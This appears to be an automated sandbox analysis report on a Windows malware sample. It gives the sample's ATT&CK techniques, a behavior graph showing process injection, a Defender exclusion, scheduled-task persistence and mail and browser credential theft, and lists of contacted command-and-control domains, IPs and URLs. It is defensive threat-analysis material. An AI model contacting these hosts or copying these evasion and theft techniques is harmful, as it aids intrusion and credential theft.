            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory113
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager221
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job            		4
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Masquerading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Modify Registry            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
            Virtualization/Sandbox Evasion            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1468932 Sample: jlsvOH1c8bSRKqM.exe Startdate: 08/07/2024 Architecture: WINDOWS Score: 100 67 www.soutsour.xyz 2->67 69 www.wb515.com 2->69 71 19 other IPs or domains 2->71 97 Snort IDS alert for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Sigma detected: Scheduled temp file as task from temp location 2->101 105 8 other signatures 2->105 10 jlsvOH1c8bSRKqM.exe 7 2->10         started        14 AZJifQrhDpEQCA.exe 5 2->14         started        signatures3 103 Performs DNS queries to domains with low reputation 67->103 process4 file5 59 C:\Users\user\AppData\...\AZJifQrhDpEQCA.exe, PE32 10->59 dropped 61 C:\...\AZJifQrhDpEQCA.exe:Zone.Identifier, ASCII 10->61 dropped 63 C:\Users\user\AppData\Local\...\tmpB59F.tmp, XML 10->63 dropped 65 C:\Users\user\...\jlsvOH1c8bSRKqM.exe.log, ASCII 10->65 dropped 109 Uses schtasks.exe or at.exe to add and modify task schedules 10->109 111 Adds a directory exclusion to Windows Defender 10->111 16 jlsvOH1c8bSRKqM.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        113 Multi AV Scanner detection for dropped file 14->113 115 Machine Learning detection for dropped file 14->115 25 AZJifQrhDpEQCA.exe 14->25         started        27 schtasks.exe 1 14->27         started        29 AZJifQrhDpEQCA.exe 14->29         started        31 AZJifQrhDpEQCA.exe 14->31         started        signatures6 process7 signatures8 79 Maps a DLL or memory area into another process 16->79 33 DAGiwzvTYsMjq.exe 16->33 injected 81 Loading BitLocker PowerShell Module 19->81 36 WmiPrvSE.exe 19->36         started        38 conhost.exe 19->38         started        40 conhost.exe 21->40         started        42 conhost.exe 23->42         started        44 DAGiwzvTYsMjq.exe 25->44 injected 46 conhost.exe 27->46         started        process9 signatures10 91 Uses cmd line tools excessively to alter registry or file data 33->91 48 reg.exe 33->48         started        93 Maps a DLL or memory area into another process 44->93 95 Found direct / indirect Syscall (likely to bypass EDR) 44->95 51 reg.exe 44->51         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 48->83 85 Tries to harvest and steal browser information (history, passwords, etc) 48->85 87 Modifies the context of a thread in another process (thread injection) 48->87 89 3 other signatures 48->89 53 DAGiwzvTYsMjq.exe 48->53 injected 57 firefox.exe 48->57         started        process13 dnsIp14 73 www.soutsour.xyz 203.161.41.207, 49759, 49760, 49761 VNPT-AS-VNVNPTCorpVN Malaysia 53->73 75 boutiqueinaboxshop.com 3.33.130.190, 49741, 49747, 49748 AMAZONEXPANSIONGB United States 53->75 77 6 other IPs or domains 53->77 107 Found direct / indirect Syscall (likely to bypass EDR) 53->107 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            jlsvOH1c8bSRKqM.exe34%ReversingLabs
            jlsvOH1c8bSRKqM.exe32%VirustotalBrowse
            jlsvOH1c8bSRKqM.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe34%ReversingLabs
            C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe32%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            angrytee.com0%VirustotalBrowse
            www.angrytee.com0%VirustotalBrowse
            www.mysticriverpath.com0%VirustotalBrowse
            www.boutiqueinaboxshop.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.jleabres.com/blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.boutiqueinaboxshop.com/3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g=0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.jleabres.com/blhi/0%Avira URL Cloudsafe
            http://www.mysticriverpath.com/0guv/0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E=0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.hf7777hi.net/w2w0/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.lmsforsme.com/ji0a/0%Avira URL Cloudsafe
            http://www.mysticriverpath.com/0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg=0%Avira URL Cloudsafe
            http://www.boutiqueinaboxshop.com/3c39/0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://blog.ytmc.fun0%Avira URL Cloudsafe
            http://www.qrdinamicos.com/3rdj/0%Avira URL Cloudsafe
            http://www.lmsforsme.com/ji0a/0%VirustotalBrowse
            http://www.hf7777hi.net/w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.jleabres.com0%Avira URL Cloudsafe
            http://www.angrytee.com/8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w=0%Avira URL Cloudsafe
            http://www.boutiqueinaboxshop.com/3c39/0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.lmsforsme.com/ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.soutsour.xyz/etzb/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://blog.ytmc.fun0%VirustotalBrowse
            http://www.mscuration.com/g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.mscuration.com/g9bf/0%Avira URL Cloudsafe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.soutsour.xyz/etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.wb515.com/fykj/0%Avira URL Cloudsafe
            http://www.wb515.com/fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo=0%Avira URL Cloudsafe
            https://www.fastmailusercontent.com/filestorage/css/main.css0%Avira URL Cloudsafe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%VirustotalBrowse
            http://www.qrdinamicos.com/3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g=0%Avira URL Cloudsafe
            http://www.orthonow.live/v6z4/0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/sm5u/0%Avira URL Cloudsafe
            https://www.fastmailusercontent.com/filestorage/css/main.css0%VirustotalBrowse
            http://www.orthonow.live/v6z4/0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mysticriverpath.com
            		216.194.173.237
            		truefalse
              		unknown
              www.qrdinamicos.com
              		217.160.0.119
              		truefalse
                		unknown
                mscuration.com
                		3.33.130.190
                		truetrue
                  		unknown
                  www.pu6wac.buzz
                  		188.114.96.3
                  		truefalse
                    		unknown
                    www.hf7777hi.net
                    		132.226.11.158
                    		truefalse
                      		unknown
                      www.orthonow.live
                      		199.59.243.226
                      		truefalse
                        		unknown
                        lmsforsme.com
                        		3.33.130.190
                        		truetrue
                          		unknown
                          fundraiserstuffies.com
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.soutsour.xyz
                            		203.161.41.207
                            		truetrue
                              		unknown
                              www.jleabres.com
                              		103.168.172.37
                              		truefalse
                                		unknown
                                angrytee.com
                                		3.33.130.190
                                		truetrueunknown
                                boutiqueinaboxshop.com
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  wb88.wb-88.com
                                  		38.47.226.116
                                  		truefalse
                                    		unknown
                                    www.mysticriverpath.com
                                    		unknown
                                    		unknowntrueunknown
                                    www.wb515.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.mscuration.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.boutiqueinaboxshop.com
                                        		unknown
                                        		unknowntrueunknown
                                        www.personal-stylist.club
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.angrytee.com
                                          		unknown
                                          		unknowntrueunknown
                                          www.lmsforsme.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.fundraiserstuffies.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.jleabres.com/blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5Nfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.boutiqueinaboxshop.com/3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jleabres.com/blhi/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mysticriverpath.com/0guv/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fundraiserstuffies.com/sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hf7777hi.net/w2w0/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.lmsforsme.com/ji0a/true
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mysticriverpath.com/0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.boutiqueinaboxshop.com/3c39/true
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.qrdinamicos.com/3rdj/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hf7777hi.net/w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5Nfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.angrytee.com/8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.lmsforsme.com/ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5Ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.soutsour.xyz/etzb/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mscuration.com/g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5Ntrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mscuration.com/g9bf/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.soutsour.xyz/etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5Nfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.wb515.com/fykj/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.wb515.com/fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.qrdinamicos.com/3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.orthonow.live/v6z4/false
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fundraiserstuffies.com/sm5u/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabreg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designersGjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/?jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/bThejlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers?jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.tiro.comjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designersjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.goodfont.co.krjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sajatypeworks.comjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netDjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.comreg.exe, 00000011.00000002.4132621406.00000000065E0000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4130930355.00000000040C6000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.00000000035F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/cThejlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://blog.ytmc.funjlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleasejlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fonts.comjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sandoll.co.krjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jleabres.comDAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.urwpp.deDPleasejlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.0000000002778000.00000004.00000800.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 00000009.00000002.1799689113.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
